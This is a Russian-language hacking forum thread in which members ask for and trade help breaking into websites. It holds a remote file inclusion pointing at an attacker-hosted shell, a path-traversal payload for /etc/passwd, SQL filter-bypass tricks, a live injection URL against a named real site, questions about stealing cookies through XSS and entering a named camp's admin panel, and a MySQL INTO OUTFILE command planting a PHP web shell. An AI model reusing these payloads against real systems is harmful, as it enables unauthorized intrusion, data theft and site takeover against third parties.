Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    Помогите как инклудить при данной ошибке?
    Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

    Warning: include(G.php) [function.include]: failed to open stream: Операция не позволяется in /var/www/x/x/x/x/x/x/index.php on line 71

    Warning: include() [function.include]: Failed opening 'G.php' for inclusion (include_path='.:') in /var/www/x/x/x/x/x/x/index.php on line 71
    Ссылка такого вида:

    http://site.ru/dir/index.php?print&id=669
    изменяю '669' выдазит уже mysql ошибка ,а мне нужен очень инклуд
     
  2. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    945
    Likes Received:
    307
    Reputations:
    51
    blesse, if allow_url_fopen != Off:

    http://site.ru/dir/index.php?print&id=http://mysite.com/shell
     
  3. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    кто небудь знает как извлечь данные из таблицы pref_tabl Если pref_ фильтруется, происходит die();
    можно ли как-нибудь закодировать имя таблицы, чтобы запрос остался рабочим? Какие варианты?
     
  4. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    вы думаете ,что я настолько глуп?
    я же говорю
    изменяю '669' вылазит уже mysql ошибка ,а мне нужен очень инклуд.
    Может ошибка гдето в скпите и вообще нету инклуда тут?
     
  5. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    2 o3,14um:

    mysql hex -> unhex ( unhex(hexedstr) ), через php проходит в хексе, в мускуле как мы знаем преобразовывается, следовательно префикс должен порйти через фильтры в php. а -ля: +WHERE+table_name=0x707265665F7461626C(pref_tabl)

    2 blesse:

    Четко и ясно написано в error: INCLUDE. Из базы берется согласно идентификатору имя файла и инклудится. Теоретически, сформировав корректный mysql inject запрос, в поле вывода, которое подставляется в качестве аргумента в include, можно реализовать задуманное. Но во первых, поле может некорректно формироваться в следствие некоторых факторов при mysql-inj, к тому же эксепшены и тп могут явно подавлять последующий инклуд при некорректном mysql запросе и тп. Может быть такое что скуля сформирована, параметр в инклуд передается, но визуально это явно не отображается.
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    Cennarios

    2 o3,14um имел ввиду вывод данных из таблицы, а не информация о таблице, то есть запрос будет select ... FROM наша_таблица, и в данном случай хекс не пройдет
     
    _________________________
  7. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Да, на самом деле. Не думаю что фильтр настолько туп ,чтобы вида (символ)pref_ пропускал ) Моя невнимательность.
     
  8. blesse

    blesse Member

    Joined:
    18 Jan 2012
    Messages:
    184
    Likes Received:
    8
    Reputations:
    1
    Нешел другой инклуд:

    http://site/patch/index.php?X=G&F=blalalal

    Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

    Warning: require(namesutf8-blalalal) [function.require]: failed to open stream: No such file or directory in /x/x/x/x/x/x/index.php on line 37

    Fatal error: require() [function.require]: Failed opening required 'namesutf8-blalalal' (include_path='.:') in /x/x/x/x/x/x/index.php on line 37
    как я понимаю тоже бесполезный?
    при изменеии переменной в ошибке оставется часть namesutf8-
    Т.Е. при http://site/patch/index.php?X=G&F=../../../../../../../../etc/passwd%00
    вылазит:
    Warning: require(namesutf8-../../../../../../../../etc/passwd)
     
  9. Manok

    Manok New Member

    Joined:
    27 Jun 2010
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Античат, помоги.

    Есть некая страница.

    page.php?text=Тест

    этот text параметр выводится на странице. XSS работает, пробовал alert.
    Фильтрации нет вообще видимо.
    Можно ли как то вставить туда php код?
     
  10. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    Нет.
     
  11. Manok

    Manok New Member

    Joined:
    27 Jun 2010
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Жаль. А что можно с этого полезного поиметь? Страница общедоступна.

    Можно ли как то скрыто стянуть куки, если разместить этот юрл в айфрейме, например?
     
  12. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    133
    Likes Received:
    40
    Reputations:
    26
    http://www.dialogas.com/senoji/index.php?lng=lt&content=pages&page_id=-52+union+select+table_name+from+information_schema.tables+--+
    не сталкивался раньше с таким, фильтруется from, можно как-то обойти?
     
  13. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,588
    Likes Received:
    1,286
    Reputations:
    1,557
    Можно. На форуме много статей про использование XSS.
     
  14. RColor

    RColor New Member

    Joined:
    17 Aug 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Нашел скулю на сайте Артека, в базе не нашел паролей. Админка расположнена по адресу artek.org/admin/ но там базовая авторизация. Можно ли получить что то полезное со скули? Как можно зайти в админку?
     
  15. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,588
    Likes Received:
    1,286
    Reputations:
    1,557
    Сообщи администрации лагеря об уязвимости и получи бесплатную путевку на следующий сезон.
     
    2 people like this.
  16. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Есть такой код:
    PHP:
    $res=mysql_query("SELECT username FROM users WHERE username='$utente' AND id<>".max(0,$_POST["uid"]));
    Заинтересовало меня то, что в функцию max() передается не фильтрованное значение.
    Так вот, если передать в max() строку - она представляется как 0, сравнится с первым и большее возвратится. Прикол в том, что max возвращает строку. Тоесть:

    max(-1,'string) возвратит string, т.к. -1<0
    max(0, 'string') возвратит 0, т.к. 0=0, и при равных значениях функция вернет первое.

    Но есть еще 1 фича!

    Если немассив сравнивать с массивом - возвращается всегда массив!
    Тоесть, max(100500, array(0,1), 'string') вернет array(0,1)!
    А теперь вопрос, получится ли провести инъекцию, если передать строку массивом?
     
  17. Ups

    Ups Member

    Joined:
    11 Apr 2011
    Messages:
    112
    Likes Received:
    11
    Reputations:
    0
    Не получается залить шелл через mysql. Права рутовые. Подключась навикатом.
    Делаю так:
    Code:
    SELECT '<?php system($_GET[c]);?>' INTO OUTFILE '/home/l2/public_html/images/sh.php'
    Не получается. :(
     
  18. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    ищи папку врайтабельную на запись
     
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Учите матчасть! root пользователь mysql в данном случае обеспечивает FILE_PRIV. root mysql никакого отношения к system user ROOT не имеет. Все операции от пользователя под которым запущен mysql сервер (обычно mysql системный юзер). Как вам и советуют - надо искать директории на которые выставлены права на запись для кого-либо помимо овнера.
     
    1 person likes this.
  20. RAS

    RAS New Member

    Joined:
    26 Jul 2011
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите, Zenmap пишет, что ос linux 2.6.15-2.6.26 с точностью 96%, и что на 80 порту находится microsoft iis httpd 6.0. По моим представлениям microsoft iis должен стоять на windows, да и регистр букв в адресе роли не играет. Значит ли это что там windows, и как можно точно определить версию ос? Можно ли верить что там microsoft iis httpd 6.0? Какие на него есть эксплойты? Посоветуйте пожалуйста, чем лучше просканировать хост?
     
Loading...
Thread Status:
Not open for further replies.